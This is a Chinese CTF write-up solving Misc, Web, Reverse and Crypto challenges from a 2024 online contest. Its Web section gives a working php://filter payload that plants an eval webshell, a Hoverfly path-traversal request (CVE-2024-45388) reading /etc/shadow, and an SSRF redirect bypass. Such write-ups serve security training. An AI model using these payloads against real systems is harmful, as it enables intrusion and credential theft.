2024-金盾信安杯线上赛 WP

Misc

大赛宗旨

记事本打开，一眼零宽隐写

B 神工具一把梭，得到一串 base 编码

base64 解码得到 flag

flag 值：flag{5d5555fa-1303-4b43-8eef-d6ea7c64c361}

esab

根据题目 esab 可以发现这正是 base 的逆向，所以可以先逆向一下给出的字符串

然后解 base，和今年御网杯那道题类似，使用特定的网站解 base62

得到一串 base64 编码的文本，使用工具 basecrack 尝试一把梭

解了一个 base64 和一个 base91，得到的文本又像是 base62，再次 base62 解码，得到 flag

flag 值：flag{634285be-e7f0-9f0a-fb90-8da3a27fce06}

ezpng

将 password.txt 的内容放入 cyberchef 解密，得到一个密码 cimbar

flag.png 放入 010 查看，发现文件头尾都不对，尝试发现是异或得到的字符串 cimbar

使用 cyberchef 把图片异或回去，得到一张正常的 png 文件

网上找到一个项目，提取出 cimbar 图片里隐藏的文本，项目地址如下

https://github.com/sz3/cimbar

下载下来，将图片放到同一目录，使用如下命令，即可得到 flag

python -m cimbar.cimbar 111.png -o myoutputfile.txt

flag 值：flag{c06ff653-d96e-4c59-9667-655a8a18862e}

so far so good

谷歌搜索，发现是国外某比赛的原题，赛名 OliCyber.IT 2024，wp 如下：

https://github.com/OliCyberIT/OliCyber.IT-Writeups/blob/master/2024-nazionale/misc03.md

利用 wp 上给出的脚本，有些地方不适配，稍微修改下脚本，运行得到 flag，脚本如下：

import pyshark
from collections import defaultdict
from Crypto.Cipher import ChaCha20
import sysKEYSET = 0x74
NONCESET = 0x11
STORE = 0xC1
RESET = 0xB8
ACK = 0x14
ERROR = 0xFFstreams = defaultdict(lambda: b"")
cap = pyshark.FileCapture(f"dump.pcapng")for p in cap:try:i = int(p.tcp.stream)streams[i] += bytes.fromhex(p.data.data)except:pass
cap.close()stream = streams[0]kidxs = [i for i, x in enumerate(stream) if x == KEYSET]
nidxs = [i for i, x in enumerate(stream) if x == NONCESET]
print(f'{kidxs = }')
print(f'{nidxs = }')def read():global streams = stream[0]stream = stream[1:]return sclass Message():def __init__(self) -> None:self.code = Noneself.param = Noneself.len = Noneself.data = Nonedef read(self):self.code = read()self.param = read()self.len = read()self.data = []for i in range(self.len):self.data.append(read())def handle(self):global KEY, IV, cipher, keyset, nonceset, ciphersetif self.code == KEYSET:for i in range(32):KEY[i] = self.data[i]keyset = Truecipherset = Falseelif self.code == NONCESET:for i in range(8):IV[i] = self.data[i]nonceset = Truecipherset = Falseelif self.code == STORE:if not keyset or not nonceset:returnif not cipherset:cipherset = Truecipher = ChaCha20.new(key=bytes(KEY), nonce=bytes(IV))dec = cipher.decrypt(bytes(self.data))for i in range(self.len):FLAG[10 * self.param + i] = dec[i]if -1 not in FLAG:print(bytes(FLAG))return Trueelif self.code == RESET:KEY = [0] * 32IV = [0] * 8keyset = Falsenonceset = Falsecipherset = False_stream = stream[:]
for ki in kidxs:for ni in nidxs:if ki > ni:continueprint('key index:', ki, '\tnonce index:', ni)KEY = [-1] * 32IV = [-1] * 8FLAG = [-1] * 40keyset = Falsenonceset = Falsecipherset = Falsecipher = Nonetry:stream = stream[ki:]m = Message()m.read()m.handle()stream = stream[ni - ki - 35:]m = Message()m.read()m.handle()while len(stream) > 0:ni = stream.index(NONCESET) if NONCESET in stream else 99999si = stream.index(STORE) if STORE in stream else 99999next_idx = min([ni, si])stream = stream[next_idx:]m = Message()m.read()if m.handle():breakexcept:print('Exception')passstream = _stream[:]

运行结果如图所示，得到 flag

flag 值：flag{0h_usb_0v3r_1p_i5_s0_c00l_567c08e6}

Web

fillllll_put

源码如下：

<?phphighlight_file(__FILE__);
$filename=$_GET['filename'];
if(isset($filename)){$content=$_GET['content'];file_put_contents($filename,'<?php exit();'.$content);} 

经典的伪协议绕过死亡 exit()，网上有很多参考文章

payload 如下：

?filename=php://filter/convert.base64-decode/resource=shell.php&content=aPD9waHAgZXZhbCgkX1BPU1RbYV0pOw==

访问 shell.php，成功解析

使用蚁剑连接一句话木马，连接成功

根目录没有，在根目录下的/tmp 目录翻到 flag.txt

flag 值：flag{89166828-7120-42be-966c-820fc46d74a6}

hoverfly

打开是一个 Hoverfly 的界面

网上找到一个 CVE，Hoverfly 任意文件读取漏洞(CVE-2024-45388)，复现文章如下：

https://blog.csdn.net/qq_38154820/article/details/142891049

burp 抓包，修改数据包如下：

PUT /api/v2/simulation HTTP/1.1
Host: 114.55.67.167:50463
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 126
Content-Type: application/x-www-form-urlencoded{"data":{"pairs":[{
"request":{},"response": {
"bodyFile": "../../../../../etc/shadow"}} ]},"meta":{"schemaVersion":"v5.2"}}

成功读取 /etc/passwd，可以读取任意文件

翻遍了没找到哪里有 flag，var/log/syslog 记录了系统级别的日志信息，包括系统启动、服务启动和停止、内核消息、硬件错误、软件错误等，在日志里得到提示 see see /tmp/fa1g

访问 /tmp/fa1g 文件得到 flag

flag 值：flag{57a4de14-9151-4554-b36a-b12dfc79c2d3}

ssrf

进入页面，提示查询网站，根据题目名字 ssrf 知道肯定是读内网文件

先扫一下有什么文件，发现 flag.php

直接读取 127.0.0.1 下的 flag.php，提示无效的 url

可以使用域名重定向绕过，找到如下域名，测试可以绕过

http://wifi.aliyun.com/flag.php

成功读取到 flag

flag 值：flag{980a8f2f-00c6-4e60-8468-9b44a948df44}

Reverse

babyre

首先通过 sub_401050 提示输入flag，并通过 sub_4010C0 读取最多32字节的输入到 v23。

输入被分为两部分：前16字节存储到 v26。后16字节存储到 v24。

前16字节解码：

使用硬编码目标值 v6 的前四组数据作为目标（共4个整数）。

对解密后的数据还原高低位交换（调用 sub_401130 的逆向逻辑）。

TEA加密逆向：根据代码分析 sub_4012B0 是TEA加密的部分，需要实现解密逻辑。

脚本如下：

#include <stdio.h>
#include <stdint.h>// TEA解密函数
void decrypt(uint32_t* v, uint32_t* key) {
uint32_t delta = 0x61C88647; // Delta常量
uint32_t sum = 0 - 32 * delta; // 初始化sum
uint32_t v0 = v[0], v1 = v[1];for (int i = 0; i < 32; i++) {v1 -= ((v0 >> 5) + key[3]) ^ (v0 + sum) ^ ((v0 << 4) + key[2]);v0 -= ((v1 >> 5) + key[1]) ^ (v1 + sum) ^ ((v1 << 4) + key[0]);sum += delta;}v[0] = v0;v[1] = v1;}int main() {// 密钥uint32_t key[4] = {0x00001266, 0x00003404, 0x0000562A, 0x000078C2};// 密文uint32_t enc[4] = {0x369A1583, 0x009A9E6D, 0xBE761C60, 0x3ED644A0};// 对密文分块解密decrypt(enc, key);     // 解密前两部分decrypt(enc + 2, key); // 解密后两部分// 输出解密后的结果（大端序）printf("Flag: ");for (int i = 0; i < 4; i++) { // 遍历解密后的4个32位整数for (int j = 3; j >= 0; j--) { // 大端序输出每个字节（高位字节在前）printf("%c", (enc[i] >> (8 * j)) & 0xFF);}}printf("\n");return 0;}

后16字节解码：

从目标值 v6 的后四组数据中提取目标（共4个整数）。

高低位交换逆向：调用 sub_401130 的逆向逻辑。

凯撒密码逆向：对替换的字符使用偏移量为 -3 的逆操作。

解密脚本如下：

def reverse_byte_order(data):"""高低位交换"""return [((x >> 24) & 0xFF) | ((x >> 8) & 0xFF00) |((x & 0xFF00) << 8) | ((x & 0xFF) << 24)for x in data]def reverse_caesar_cipher(data, shift=3):"""逆凯撒密码，shift是偏移量"""result = []for ch in data:if 'A' <= ch <= 'Z':result.append(chr((ord(ch) - shift - 65) % 26 + 65))elif 'a' <= ch <= 'z':result.append(chr((ord(ch) - shift - 97) % 26 + 97))else:result.append(ch)return ''.join(result)# 硬编码的目标数据
v6 = [916067715, 10133101, -1099555744, 1054229664,1685154385, 1816750188, 1416384356, 1814110589
]v19 = v6[4:]
v19 = reverse_byte_order(v19)
cipher2 = ''.join([chr((x >> (8 * i)) & 0xFF) for x in v19 for i in range(4)])
plain2 = reverse_caesar_cipher(cipher2)print(plain2)

两端 flag 都已经拿到了，直接拼接两段，得到完整 flag

flag 值：flag{ZhuangBiWoRangNiFeiQiLai!!}

Crypto

Ezrsa

from Crypto.Util.number import *
from Crypto.Util.Padding import *def generate_prime(bits=512):return getPrime(bits)
def generate_rsa_key(bits=512, e=9):while True:p, q = generate_prime(bits), generate_prime(bits)n = p * qif GCD((p-1)*(q-1), e) == 1:d = inverse(e, (p-1)*(q-1))return n, e, d
def encrypt_message(message, e, n):return pow(message, e, n)
def decrypt_message(ciphertext, d, n):return pow(ciphertext, d, n)
def main(flag_text=b"flag{*******************}", num_keys=9, bits=512, e=9):FLAG = bytes_to_long(pad(flag_text, 64))n_list = []c_list = []for i in range(num_keys):n, e, d = generate_rsa_key(bits, e)n_list.append(n)c = encrypt_message(FLAG, e, n)c_list.append(c)assert decrypt_message(c, d, n) == FLAGprint("n_list:", n_list)print("c_list:", c_list)if __name__ == "__main__":main()

看到e=9，以及九组密文c和模数n，挨个爆破

Ci=pow(m,e,Ni) i=1,2,3,....,9

对list_n和list_c遍历爆破

脚本如下：

import gmpy2
import math
from Crypto.Util.number import long_to_bytesdef merge(a1, n1, a2, n2):d = math.gcd(n1, n2)c = a2 - a1if c % d != 0:return 0c = (c % n2 + n2) % n2c = c // dn1 = n1 // dn2 = n2 // dc *= gmpy2.invert(n1, n2)c %= n2c *= n1 * dc += a1global n3global a3n3 = n1 * n2 * da3 = (c % n3 + n3) % n3return 1def exCRT(a, n):a1 = a[0]n1 = n[0]le = len(a)for i in range(1, le):a2 = a[i]n2 = n[i]if not merge(a1, n1, a2, n2):return -1a1 = a3n1 = n3global modmod = n1return (a1 % n1 + n1) % n1def exCRT_getequation(a, n):a1 = a[0]n1 = n[0]le = len(a)for i in range(1, le):a2 = a[i]n2 = n[i]if not merge(a1, n1, a2, n2):return -1a1 = a3n1 = n3return (a1, n1)# 示例数据
n = [...]  # 请替换为实际的n值
c = [...]  # 请替换为实际的c值m9 = exCRT(c, n)
m = gmpy2.iroot(m9, 9)[0]
print(long_to_bytes(m))

flag 值：flag{25f028f3-5362-4d1d-ab16-ae65503e447f}

Madoka Runes

搜索题目，发现图形加密方式，魔女文字，对比得到压缩包密码ctf951zhen，从而得到flag

flag 值：flag{f393e6c7-b150-6ecd-0458-c8f38363cb3e}